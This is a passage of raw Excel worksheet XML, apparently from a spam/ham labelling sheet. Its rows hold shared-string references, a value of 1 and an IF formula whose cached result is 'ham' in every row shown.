      <c r="C1056" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1057" t="s">
        <v>597</v>
      </c>
      <c r="B1057">
        <v>1</v>
      </c>
      <c r="C1057" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1058" t="s">
        <v>763</v>
      </c>
      <c r="B1058">
        <v>1</v>
      </c>
      <c r="C1058" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1059" t="s">
        <v>764</v>
      </c>
      <c r="B1059">
        <v>1</v>
      </c>
      <c r="C1059" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1060" t="s">
        <v>765</v>
      </c>
      <c r="B1060">
        <v>1</v>
      </c>
      <c r="C1060" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1061" t="s">
        <v>766</v>
      </c>
      <c r="B1061">
        <v>1</v>
      </c>
      <c r="C1061" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1062" t="s">
        <v>767</v>
      </c>
      <c r="B1062">
        <v>1</v>
      </c>
      <c r="C1062" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1063" t="s">
        <v>21</v>
      </c>
      <c r="B1063">
        <v>1</v>
      </c>
      <c r="C1063" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1064" t="s">
        <v>768</v>
      </c>
      <c r="B1064">
        <v>1</v>
      </c>
      <c r="C1064" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1065" t="s">
        <v>768</v>
      </c>
      <c r="B1065">
        <v>1</v>
      </c>
      <c r="C1065" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1066" t="s">
        <v>769</v>
      </c>
      <c r="B1066">
        <v>1</v>
      </c>
      <c r="C1066" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1067" t="s">
        <v>770</v>
      </c>
      <c r="B1067">
        <v>1</v>
      </c>
      <c r="C1067" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1068" t="s">
        <v>21</v>
      </c>
      <c r="B1068">
        <v>1</v>
      </c>
      <c r="C1068" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1069" t="s">
        <v>771</v>
      </c>
      <c r="B1069">
        <v>1</v>
      </c>
      <c r="C1069" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1070" t="s">
        <v>772</v>
      </c>
      <c r="B1070">
        <v>1</v>
      </c>
      <c r="C1070" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1071" t="s">
        <v>21</v>
      </c>
      <c r="B1071">
        <v>1</v>
      </c>
      <c r="C1071" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1072" t="s">
        <v>21</v>
      </c>
      <c r="B1072">
        <v>1</v>
      </c>
      <c r="C1072" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1073" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1073" t="s">
        <v>773</v>
      </c>
      <c r="B1073">
        <v>1</v>
      </c>
      <c r="C1073" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1074" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1074" t="s">
        <v>774</v>
      </c>
      <c r="B1074">
        <v>1</v>
      </c>
      <c r="C1074" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1075" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1075" t="s">
        <v>774</v>
      </c>
      <c r="B1075">
        <v>1</v>
      </c>
      <c r="C1075" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1076" t="s">
        <v>775</v>
      </c>
      <c r="B1076">
        <v>1</v>
      </c>
      <c r="C1076" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1077" t="s">
        <v>21</v>
      </c>
      <c r="B1077">
        <v>1</v>
      </c>
      <c r="C1077" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1078" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1078" t="s">
        <v>21</v>
      </c>
      <c r="B1078">
        <v>1</v>
      </c>
      <c r="C1078" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1079" t="s">
        <v>636</v>
      </c>
      <c r="B1079">
        <v>1</v>
      </c>
      <c r="C1079" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1080" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1080" t="s">
        <v>776</v>
      </c>
      <c r="B1080">
        <v>1</v>
      </c>
      <c r="C1080" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1081" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1081" t="s">
        <v>21</v>
      </c>
      <c r="B1081">
        <v>1</v>
      </c>
      <c r="C1081" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1082" t="s">
        <v>691</v>
      </c>
      <c r="B1082">
        <v>1</v>
      </c>
      <c r="C1082" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1083" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1083" t="s">
        <v>668</v>
      </c>
      <c r="B1083">
        <v>1</v>
      </c>
      <c r="C1083" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1084" t="s">
        <v>617</v>
      </c>
      <c r="B1084">
        <v>1</v>
      </c>
      <c r="C1084" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1085" t="s">
        <v>777</v>
      </c>
      <c r="B1085">
        <v>1</v>
      </c>
      <c r="C1085" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1086" t="s">
        <v>778</v>
      </c>
      <c r="B1086">
        <v>1</v>
      </c>
      <c r="C1086" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1087" t="s">
        <v>117</v>
      </c>
      <c r="B1087">
        <v>1</v>
      </c>
      <c r="C1087" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1088" t="s">
        <v>779</v>
      </c>
      <c r="B1088">
        <v>1</v>
      </c>
      <c r="C1088" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1089" t="s">
        <v>639</v>
      </c>
      <c r="B1089">
        <v>1</v>
      </c>
      <c r="C1089" t="str">
        <f t="shared" si="16"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1090" t="s">
        <v>780</v>
      </c>
      <c r="B1090">
        <v>1</v>
      </c>
      <c r="C1090" t="str">
        <f t="shared" ref="C1090:C1153" si="17">IF(B1090="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1091" t="s">
        <v>781</v>
      </c>
      <c r="B1091">
        <v>1</v>
      </c>
      <c r="C1091" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1092" t="s">
        <v>782</v>
      </c>
      <c r="B1092">
        <v>1</v>
      </c>
      <c r="C1092" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1093" t="s">
        <v>783</v>
      </c>
      <c r="B1093">
        <v>1</v>
      </c>
      <c r="C1093" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1094" t="s">
        <v>784</v>
      </c>
      <c r="B1094">
        <v>1</v>
      </c>
      <c r="C1094" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1095" t="s">
        <v>598</v>
      </c>
      <c r="B1095">
        <v>1</v>
      </c>
      <c r="C1095" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1096" t="s">
        <v>21</v>
      </c>
      <c r="B1096">
        <v>1</v>
      </c>
      <c r="C1096" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1097" t="s">
        <v>785</v>
      </c>
      <c r="B1097">
        <v>1</v>
      </c>
      <c r="C1097" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1098" t="s">
        <v>786</v>
      </c>
      <c r="B1098">
        <v>1</v>
      </c>
      <c r="C1098" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1099" t="s">
        <v>787</v>
      </c>
      <c r="B1099">
        <v>1</v>
      </c>
      <c r="C1099" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1100" t="s">
        <v>117</v>
      </c>
      <c r="B1100">
        <v>1</v>
      </c>
      <c r="C1100" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1101" t="s">
        <v>788</v>
      </c>
      <c r="B1101">
        <v>1</v>
      </c>
      <c r="C1101" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1102" t="s">
        <v>21</v>
      </c>
      <c r="B1102">
        <v>1</v>
      </c>
      <c r="C1102" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1103" t="s">
        <v>789</v>
      </c>
      <c r="B1103">
        <v>1</v>
      </c>
      <c r="C1103" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1104" t="s">
        <v>790</v>
      </c>
      <c r="B1104">
        <v>1</v>
      </c>
      <c r="C1104" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1105" t="s">
        <v>791</v>
      </c>
      <c r="B1105">
        <v>1</v>
      </c>
      <c r="C1105" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1106" t="s">
        <v>792</v>
      </c>
      <c r="B1106">
        <v>1</v>
      </c>
      <c r="C1106" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1107" t="s">
        <v>21</v>
      </c>
      <c r="B1107">
        <v>1</v>
      </c>
      <c r="C1107" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1108" t="s">
        <v>793</v>
      </c>
      <c r="B1108">
        <v>1</v>
      </c>
      <c r="C1108" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1109" t="s">
        <v>794</v>
      </c>
      <c r="B1109">
        <v>1</v>
      </c>
      <c r="C1109" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1110" t="s">
        <v>21</v>
      </c>
      <c r="B1110">
        <v>1</v>
      </c>
      <c r="C1110" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1111" t="s">
        <v>795</v>
      </c>
      <c r="B1111">
        <v>1</v>
      </c>
      <c r="C1111" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1112" t="s">
        <v>21</v>
      </c>
      <c r="B1112">
        <v>1</v>
      </c>
      <c r="C1112" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1113" t="s">
        <v>21</v>
      </c>
      <c r="B1113">
        <v>1</v>
      </c>
      <c r="C1113" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1114" t="s">
        <v>796</v>
      </c>
      <c r="B1114">
        <v>1</v>
      </c>
      <c r="C1114" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1115" t="s">
        <v>797</v>
      </c>
      <c r="B1115">
        <v>1</v>
      </c>
      <c r="C1115" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1116" t="s">
        <v>798</v>
      </c>
      <c r="B1116">
        <v>1</v>
      </c>
      <c r="C1116" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1117" t="s">
        <v>799</v>
      </c>
      <c r="B1117">
        <v>1</v>
      </c>
      <c r="C1117" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1118" t="s">
        <v>800</v>
      </c>
      <c r="B1118">
        <v>1</v>
      </c>
      <c r="C1118" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1119" t="s">
        <v>801</v>
      </c>
      <c r="B1119">
        <v>1</v>
      </c>
      <c r="C1119" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1120" t="s">
        <v>802</v>
      </c>
      <c r="B1120">
        <v>1</v>
      </c>
      <c r="C1120" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1121" t="s">
        <v>803</v>
      </c>
      <c r="B1121">
        <v>1</v>
      </c>
      <c r="C1121" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1122" t="s">
        <v>639</v>
      </c>
      <c r="B1122">
        <v>1</v>
      </c>
      <c r="C1122" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1123" t="s">
        <v>804</v>
      </c>
      <c r="B1123">
        <v>1</v>
      </c>
      <c r="C1123" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1124" t="s">
        <v>805</v>
      </c>
      <c r="B1124">
        <v>1</v>
      </c>
      <c r="C1124" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1125" t="s">
        <v>752</v>
      </c>
      <c r="B1125">
        <v>1</v>
      </c>
      <c r="C1125" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1126" t="s">
        <v>806</v>
      </c>
      <c r="B1126">
        <v>1</v>
      </c>
      <c r="C1126" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1127" t="s">
        <v>758</v>
      </c>
      <c r="B1127">
        <v>1</v>
      </c>
      <c r="C1127" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1128" t="s">
        <v>807</v>
      </c>
      <c r="B1128">
        <v>1</v>
      </c>
      <c r="C1128" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1129" t="s">
        <v>808</v>
      </c>
      <c r="B1129">
        <v>1</v>
      </c>
      <c r="C1129" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1130" t="s">
        <v>21</v>
      </c>
      <c r="B1130">
        <v>1</v>
      </c>
      <c r="C1130" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1131" t="s">
        <v>809</v>
      </c>
      <c r="B1131">
        <v>1</v>
      </c>
      <c r="C1131" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1132" t="s">
        <v>810</v>
      </c>
      <c r="B1132">
        <v>1</v>
      </c>
      <c r="C1132" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1133" t="s">
        <v>696</v>
      </c>
      <c r="B1133">
        <v>1</v>
      </c>
      <c r="C1133" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1134" t="s">
        <v>811</v>
      </c>
      <c r="B1134">
        <v>1</v>
      </c>
      <c r="C1134" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1135" t="s">
        <v>812</v>
      </c>
      <c r="B1135">
        <v>1</v>
      </c>
      <c r="C1135" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1136" t="s">
        <v>813</v>
      </c>
      <c r="B1136">
        <v>1</v>
      </c>
      <c r="C1136" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1137" t="s">
        <v>21</v>
      </c>
      <c r="B1137">
        <v>1</v>
      </c>
      <c r="C1137" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1138" t="s">
        <v>21</v>
      </c>
      <c r="B1138">
        <v>1</v>
      </c>
      <c r="C1138" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1139" t="s">
        <v>814</v>
      </c>
      <c r="B1139">
        <v>1</v>
      </c>
      <c r="C1139" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1140" t="s">
        <v>21</v>
      </c>
      <c r="B1140">
        <v>1</v>
      </c>
      <c r="C1140" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1141" t="s">
        <v>815</v>
      </c>
      <c r="B1141">
        <v>1</v>
      </c>
      <c r="C1141" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1142" t="s">
        <v>816</v>
      </c>
      <c r="B1142">
        <v>1</v>
      </c>
      <c r="C1142" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1143" t="s">
        <v>691</v>
      </c>
      <c r="B1143">
        <v>1</v>
      </c>
      <c r="C1143" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1144" t="s">
        <v>817</v>
      </c>
      <c r="B1144">
        <v>1</v>
      </c>
      <c r="C1144" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1145" t="s">
        <v>818</v>
      </c>
      <c r="B1145">
        <v>1</v>
      </c>
      <c r="C1145" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1146" t="s">
        <v>819</v>
      </c>
      <c r="B1146">
        <v>1</v>
      </c>
      <c r="C1146" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1147" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1147" t="s">
        <v>820</v>
      </c>
      <c r="B1147">
        <v>1</v>
      </c>
      <c r="C1147" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1148" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1148" t="s">
        <v>821</v>
      </c>
      <c r="B1148">
        <v>1</v>
      </c>
      <c r="C1148" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1149" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1149" t="s">
        <v>822</v>
      </c>
      <c r="B1149">
        <v>1</v>
      </c>
      <c r="C1149" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1150" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1150" t="s">
        <v>823</v>
      </c>
      <c r="B1150">
        <v>1</v>
      </c>
      <c r="C1150" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1151" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1151" t="s">
        <v>824</v>
      </c>
      <c r="B1151">
        <v>1</v>
      </c>
      <c r="C1151" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1152" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1152" t="s">
        <v>825</v>
      </c>
      <c r="B1152">
        <v>1</v>
      </c>
      <c r="C1152" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1153" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1153" t="s">
        <v>826</v>
      </c>
      <c r="B1153">
        <v>1</v>
      </c>
      <c r="C1153" t="str">
        <f t="shared" si="17"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1154" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1154" t="s">
        <v>827</v>
      </c>
      <c r="B1154">
        <v>1</v>
      </c>
      <c r="C1154" t="str">
        <f t="shared" ref="C1154:C1217" si="18">IF(B1154="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1155" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1155" t="s">
        <v>828</v>
      </c>
      <c r="B1155">
        <v>1</v>
      </c>
      <c r="C1155" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1156" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1156" t="s">
        <v>829</v>
      </c>
      <c r="B1156">
        <v>1</v>
      </c>
      <c r="C1156" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1157" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1157" t="s">
        <v>830</v>
      </c>
      <c r="B1157">
        <v>1</v>
      </c>
      <c r="C1157" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1158" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1158" t="s">
        <v>831</v>
      </c>
      <c r="B1158">
        <v>1</v>
      </c>
      <c r="C1158" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1159" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1159" t="s">
        <v>832</v>
      </c>
      <c r="B1159">
        <v>1</v>
      </c>
      <c r="C1159" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1160" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1160" t="s">
        <v>833</v>
      </c>
      <c r="B1160">
        <v>1</v>
      </c>
      <c r="C1160" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1161" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1161" t="s">
        <v>834</v>
      </c>
      <c r="B1161">
        <v>1</v>
      </c>
      <c r="C1161" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1162" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1162" t="s">
        <v>835</v>
      </c>
      <c r="B1162">
        <v>1</v>
      </c>
      <c r="C1162" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1163" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1163" t="s">
        <v>836</v>
      </c>
      <c r="B1163">
        <v>1</v>
      </c>
      <c r="C1163" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1164" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1164" t="s">
        <v>21</v>
      </c>
      <c r="B1164">
        <v>1</v>
      </c>
      <c r="C1164" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1165" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1165" t="s">
        <v>837</v>
      </c>
      <c r="B1165">
        <v>1</v>
      </c>
      <c r="C1165" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1166" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1166" t="s">
        <v>21</v>
      </c>
      <c r="B1166">
        <v>1</v>
      </c>
      <c r="C1166" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1167" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1167" t="s">
        <v>838</v>
      </c>
      <c r="B1167">
        <v>1</v>
      </c>
      <c r="C1167" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1168" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1168" t="s">
        <v>839</v>
      </c>
      <c r="B1168">
        <v>1</v>
      </c>
      <c r="C1168" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1169" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1169" t="s">
        <v>840</v>
      </c>
      <c r="B1169">
        <v>1</v>
      </c>
      <c r="C1169" t="str">
